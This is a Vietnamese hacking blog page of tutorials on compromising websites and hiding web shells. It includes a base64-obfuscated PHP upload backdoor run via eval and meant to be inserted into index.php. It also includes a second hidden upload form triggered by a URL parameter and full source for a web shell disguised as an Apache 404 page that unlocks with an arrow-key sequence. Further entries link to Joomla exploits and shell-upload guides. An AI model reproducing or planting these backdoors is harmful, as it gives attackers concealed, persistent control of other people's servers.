Trang

[TUT] Khai thác Bug Joomla 1.6,1.7,2.5.0 và 2.5.2

Khai thác Bug Joomla 1.6,1.7,2.5.0 và 2.5.2 Download http://www.mediafire.com/?h7h16yg34w9jhpl

Xem Thêm
Người đăng: Unknown vào lúc 15:32 3 nhận xét

 

Tut giấu shell

Mọi người thấy hay thì cho em tí tín dụng để vào Family nhé 

Bình thường, sau khi đã up dc shell lên host, việc đầu tiên có lẽ là tìm chỗ giấu shell.

Vậy giấu shell làm sao để admin khó biết ?

Có nhiều cách: đặt tên na ná tên các file trên host, giấu ở các folder kín,...

Bài viết sau đây giới thiệu một cách giấu shell khác, khá hữu dụng 

Bước 1: Giấu
+ Chọn một file nào đó trên host (VD: index.php)
+ Chèn thêm đoạn code sau vào giữa file:

Code:
eval(base64_decode("Pz48P3BocCBpZihpc3NldCgkX0dFVFsiYWN0Il0pICYmICRfR0VUWyJhY3QiXT09InNvaWRhaWthIil7CgppZihpc3NldCgkX0ZJTEVTWyJGaWxlIl0pKQp7CiRQYXRoPWV4cGxvZGUoIi8iLF9fRklMRV9fKTsKdW5zZXQoJFBhdGhbY291bnQoJFBhdGgpLTFdKTsKJFBhdGg9aW1wbG9kZSgiLyIsJFBhdGgpOwokUGF0aC49Ii8iLiRfRklMRVNbIkZpbGUiXVsibmFtZSJdOwoJaWYgKCRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSA+IDApCgl7CgllY2hvICJFcnJvcjogIiAuICRfRklMRVNbIkZpbGUiXVsiZXJyb3IiXSAuICI8YnIgLz4iOwoJfQoJZWxzZSBpZihtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siRmlsZSJdWyJ0bXBfbmFtZSJdLCRQYXRoKSkKCXsKCWVjaG8gIlN0b3JlZCBpbjogIiAuJFBhdGg7Cgl9Cn0KPz4KPGZvcm0gbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIj4KCTxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJGaWxlIi8+PGlucHV0IHR5cGU9InN1Ym1pdCIvPgo8L2Zvcm0+Cjxici8+CkNvZGVkIGJ5IExlb3JpdXMKPD9waHAKZXhpdDsKfQo/Pjw/"));

Bước 2: Sử dụng
+ Truy cập vào index.php?act=soidaika

========================================================
lang thang có thấy mấy đoạn code này chèn vô index,hóa ra của bạn,
thêm 1 doạn nho nhỏ nè chèn bất kỳ đâu nhé,khó mà mò dc nó 
if($_GET['id']=='hk')
{
echo '<form method="POST" enctype="multipart/form-data" action="?id=hk">
<input type="file" name="file_upload" size="20" id="file">
<input type="submit" name="gui" value="Up" >
</form>';if (isset($_POST['gui'])){
move_uploaded_file($_FILES['file_upload']['tmp_name'], $_FILES['file_upload']['name']);
}
}
nếu chèn vô index sẽ là
index.php?id=hk
sẽ thấy from upload

Xem Thêm
Người đăng: Unknown vào lúc 12:43 0 nhận xét

 

Symlink sa 3.0

Xem Thêm
Người đăng: Unknown vào lúc 12:42 0 nhận xét

 

[TUT] Nguỵ trang shell kiểu úc cmnr

Tình cờ nghĩ ra cách làm shell thật thật giả giả đánh lừa thị giác admin 

1. Anh em tạo 1 file leoshell.php nội dung như sau:
<?php
if(isset($_FILES["File"]))
{
define("DS",DIRECTORY_SEPARATOR);
echo "<body style='background:#000;color:#66ff00'>";
$Path=explode(DS,__FILE__);
unset($Path[count($Path)-1]);
$Path=implode(DS,$Path);
$Path.=DS.$_FILES["File"]["name"];
if ($_FILES["File"]["error"] > 0)
{
echo "Error: " . $_FILES["File"]["error"] . "<br />";
}
else if(move_uploaded_file($_FILES["File"]["tmp_name"],$Path))
{
echo "Stored in: " .$Path;
@chmod($Path,0755);
}
echo "</body>";
exit;
}
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
<script type="text/javascript" src="http://code.jquery.com/jquery-1.8.1.min.js"></script>
<script type="text/javascript">
$(document).ready(function(){
var password="[left][right][left][right][up][down]";
var passwordType="";
$('body').keydown(function(e) {
if(passwordType=="[END]"){return false;}
switch(eval(e.which))
{
case 37:{
passwordType+="[left]";
break;
}
case 38:{
passwordType+="[up]";
break;
}
case 39:{
passwordType+="[right]";
break;
}
case 40:{
passwordType+="[down]";
break;
}
default:{
passwordType+="";
break;
}
}
if(passwordType.indexOf(password)>=0)
{
passwordType="[END]";
$("body").fadeOut(1000,function(){
$("body").css({"background":"#000000","color":"#66 ff00"});
$("body").fadeIn(1000,function(){
$("body h1").fadeOut(500,function(){
$("body h1").html("Welcome back, my Hacker !");
$("body h1").fadeIn(500);
$("body p").eq(0).fadeOut(500,function(){
$(this).html("<form method='post' enctype='multipart/form-data'>Select file to upload: <input type='file' name='File'/><input type='submit'/>");
$(this).fadeIn(500);
$("title").html("Hacked !!!!");
$("p").eq(1).html("");
$("address").html("Coded by Leorius !");
});
});
});
});
}
});
});
</script>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?=$_SERVER['REQUEST_URI']?> was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5 mod_qos/9.74 mod_bwlimited/1.4 Server at <?=$_SERVER['SERVER_NAME']?> Port 80</address>
</body></html>
 2. Chạy file leoshell.php trên host, sẽ thấy trang 404 file not found, anh em bình tĩnh, gõ lần lượt các phím [trái] [phải] [trái] [phải] [lên] [xuống], kho báu sẽ hiện ra 

3. Các bảo có thể edit mật khẩu ở đoạn, theo đúng các cú pháp [left][up][right][down]:
var password="[left][right][left][right][up][down]"

Xem Thêm
Người đăng: Unknown vào lúc 12:40 0 nhận xét

 

TUT local server BSG

download: http://www.mediafire.com/?v6rbccf7occhfx6
pass: vhb

Nguồn: VHB

Xem Thêm
Người đăng: Unknown vào lúc 12:29 1 nhận xét

 

[Tut] Local Và Up Shell Wordpress

Xem Thêm
Người đăng: Unknown vào lúc 12:29 0 nhận xét

 

[TUT] Local server 27.0.12.24

Xem Thêm
Người đăng: Unknown vào lúc 12:28 0 nhận xét

 

[TUT] local bằng apache + phát tán shell

Xem Thêm
Người đăng: Unknown vào lúc 12:27 0 nhận xét

 

[TUT] Local gioitre9x.com

Xem Thêm
Người đăng: Unknown vào lúc 12:27 0 nhận xét

 

Share code WAP (banana)



http://nq2.upanh.com/b4.s32.d1/99e10e5c49043044987ed4ef593ce80e_48974092.ngay.png 


Pass: vnhgroup

Nguồn: VNH Group

Xem Thêm
Người đăng: Unknown vào lúc 12:25 0 nhận xét

 

Tut up shell source Vietnext

 http://www.mediafire.com/?iu3926t1pu63o23

Xem Thêm
Người đăng: Unknown vào lúc 12:25 0 nhận xét

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương